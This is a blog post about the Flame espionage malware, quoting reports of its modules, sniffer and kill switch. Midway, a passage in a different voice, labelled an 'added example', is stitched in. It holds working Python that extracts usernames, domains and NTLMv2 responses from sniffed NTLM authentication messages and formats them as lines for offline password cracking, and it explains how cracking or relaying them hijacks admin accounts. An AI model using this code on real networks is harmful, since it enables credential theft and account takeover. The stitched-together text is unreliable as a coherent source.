Stuxnet On Steroids
Meet Flame. A cyber threat that makes Stuxnet seem like child's play.
It appears that there’s another cyberattack being directed at Iran:
A massive, highly sophisticated piece of malware has been newly found infecting systems in Iran and elsewhere and is believed to be part of a well-coordinated, ongoing, state-run cyberespionage operation.
The malware, discovered by Russia-based anti-virus firm Kaspersky Lab, is an espionage toolkit that has been infecting targeted systems in Iran, Lebanon, Syria, Sudan, the Israeli Occupied Territories and other countries in the Middle East and North Africa for at least two years.
Dubbed “Flame” by Kaspersky, the malicious code dwarfs Stuxnet in size – the groundbreaking infrastructure-sabotaging malware that is believed to have wreaked havoc on Iran’s nuclear program in 2009 and 2010. Although Flame has both a different purpose and composition than Stuxnet, and appears to have been written by different programmers, its complexity, the geographic scope of its infections and its behavior indicate strongly that a nation-state is behind Flame, rather than common cyber-criminals — marking it as yet another tool in the growing arsenal of cyberweaponry.
The researchers say that Flame may be part of a parallel project created by contractors who were hired by the same nation-state team that was behind Stuxnet and its sister malware, DuQu.
“Stuxnet and Duqu belonged to a single chain of attacks, which raised cyberwar-related concerns worldwide,” said Eugene Kaspersky, CEO and co-founder of Kaspersky Lab, in a statement. “The Flame malware looks to be another phase in this war, and it’s important to understand that such cyber weapons can easily be used against any country.”
Early analysis of Flame by the Lab indicates that it’s designed primarily to spy on the users of infected computers and steal data from them, including documents, recorded conversations and keystrokes. It also opens a backdoor to infected systems to allow the attackers to tweak the toolkit and add new functionality.
The malware, which is 20 megabytes when all of its modules are installed, contains multiple libraries, SQLite3 databases, various levels of encryption — some strong, some weak — and 20 plug-ins that can be swapped in and out to provide various functionality for the attackers. It even contains some code that is written in the Lua programming language — an uncommon choice for malware.
Kaspersky Lab is calling it “one of the most complex threats ever discovered.”
Flame has apparently been in the wild since at least 2010, which means that its creation may predate Stuxnet and its related viruses. The fact that it went nearly two years without being detected is of no small concern and an indication of just how sophisticated the program apparently is. Of course, given some of the things that Flame can apparently do, its sophistication is rather obvious:
Among Flame’s many modules is one that turns on the internal microphone of an infected machine to secretly record conversations that occur either over Skype or in the computer’s near vicinity; a module that turns Bluetooth-enabled computers into a Bluetooth beacon, which scans for other Bluetooth-enabled devices in the vicinity to siphon names and phone numbers from their contacts folder; and a module that grabs and stores frequent screenshots of activity on the machine, such as instant-messaging and email communications, and sends them via a covert SSL channel to the attackers’ command-and-control servers.
The malware also has a sniffer component that can scan all of the traffic on an infected machine’s local network and collect usernames and password hashes that are transmitted across the network. The attackers appear to use this component to hijack administrative accounts and gain high-level privileges to other machines and parts of the network.
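The sniffer described above harvests usernames and password hashes as they cross the local network, which is all an attacker needs to start hijacking administrative accounts. On a Windows network those credentials travel as NTLM challenge-response blobs, so the following added example (my own illustration, not Flame's code; the article does not say which protocol Flame's sniffer parsed, so NTLM is an assumption) builds a constructed NTLM AUTHENTICATE_MESSAGE in the MS-NLMP layout, extracts from it exactly what a passive sniffer gets, and formats an NTLMv2 response in the `user::DOMAIN:challenge:NTProofStr:blob` line offline crackers consume. Every name, host and byte below is made up.

```python
"""Extract what an on-LAN credential sniffer harvests from NTLM authentication.

Added example for illustration; it is not Flame's code. It assumes the harvested
"usernames and password hashes" are NTLM AUTHENTICATE_MESSAGE (Type 3) blobs as
laid out in MS-NLMP. The sample message is constructed here, not a real capture.
"""
import struct

NTLMSSP = b"NTLMSSP\x00"
AUTHENTICATE = 3
NEGOTIATE_UNICODE = 0x00000001
FIELD_NAMES = ("lm_response", "nt_response", "domain", "user", "workstation", "session_key")
HEADER_LEN = 88  # signature(8) + type(4) + 6 descriptors(48) + flags(4) + version(8) + MIC(16)


def build_authenticate(domain, user, workstation, nt_response, lm_response=b"", session_key=b""):
    """Construct a Type 3 message so the parser can be exercised offline."""
    blobs = [lm_response, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), session_key]
    descriptors, payload = b"", b""
    for blob in blobs:
        # Each descriptor is (Len, MaxLen, BufferOffset); offsets count from message start.
        descriptors += struct.pack("<HHI", len(blob), len(blob), HEADER_LEN + len(payload))
        payload += blob
    return (NTLMSSP + struct.pack("<I", AUTHENTICATE) + descriptors
            + struct.pack("<I", NEGOTIATE_UNICODE) + bytes(8) + bytes(16) + payload)


def parse_authenticate(msg):
    """Pull user, domain, workstation and the NT challenge-response out of a Type 3 blob."""
    if not msg.startswith(NTLMSSP) or len(msg) < 64:
        raise ValueError("not an NTLMSSP message")
    (msg_type,) = struct.unpack_from("<I", msg, 8)
    if msg_type != AUTHENTICATE:
        raise ValueError(f"expected AUTHENTICATE (3), got type {msg_type}")
    raw = {}
    for i, name in enumerate(FIELD_NAMES):
        length, _maxlen, offset = struct.unpack_from("<HHI", msg, 12 + 8 * i)
        if offset + length > len(msg):
            raise ValueError(f"{name} descriptor points outside the message")
        raw[name] = msg[offset:offset + length]
    (flags,) = struct.unpack_from("<I", msg, 60)
    codec = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"  # OEM code page approximated
    nt = raw["nt_response"]
    return {
        "user": raw["user"].decode(codec),
        "domain": raw["domain"].decode(codec),
        "workstation": raw["workstation"].decode(codec),
        # A 24-byte NT response is NTLMv1; NTLMv2 is a 16-byte NTProofStr followed by a blob.
        "variant": "NTLMv2" if len(nt) > 24 else "NTLMv1",
        "nt_response": nt,
    }


def crack_line(parsed, server_challenge):
    """Format an NTLMv2 response as the user::DOMAIN:challenge:NTProofStr:blob line
    offline crackers consume. The 8-byte server challenge comes from the preceding
    Type 2 message, so a sniffer has to pair the two."""
    if parsed["variant"] != "NTLMv2":
        raise ValueError("only NTLMv2 responses are formatted here")
    nt = parsed["nt_response"]
    return f'{parsed["user"]}::{parsed["domain"]}:{server_challenge.hex()}:{nt[:16].hex()}:{nt[16:].hex()}'


# Constructed sample (hypothetical domain, user and host): not a real capture.
SAMPLE = build_authenticate("CORP", "admin", "WS01", nt_response=b"\x11" * 16 + b"\x22" * 24)
SAMPLE_CHALLENGE = b"\x01\x23\x45\x67\x89\xab\xcd\xef"

if __name__ == "__main__":
    info = parse_authenticate(SAMPLE)
    print(info["variant"], info["domain"] + "\\" + info["user"], "from", info["workstation"])
    print(crack_line(info, SAMPLE_CHALLENGE))
```

The point of the exercise is the asymmetry: nothing in the exchange is secret from a host on the same segment, and once the response and challenge are paired the attacker can crack the password offline or relay the authentication, which is how a harvested hash turns into a hijacked administrative account on other machines.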
There’s no indication where Flame may have come from, though it does have similarities to Stuxnet in terms of some of the exploits it uses to gain access to a system and transmit information. Stuxnet, of course, is widely believed to have been a joint U.S.-Israeli project designed primarily to disable as many Iranian nuclear centrifuges as possible. Flame, on the other hand, appears to be designed primarily to conduct espionage surreptitiously. The program even contains a “kill switch” that, once activated remotely, removes all evidence of the program and the work it has done from a system. Clearly not the work of amateurs.
Given where the program has ended up, it is not unreasonable to assume that Flame may have had an origin similar to that of Stuxnet. However, it’s also a reminder that we’re entering a new era of cyber-war and that it’s only a matter of time before something similar is aimed at us.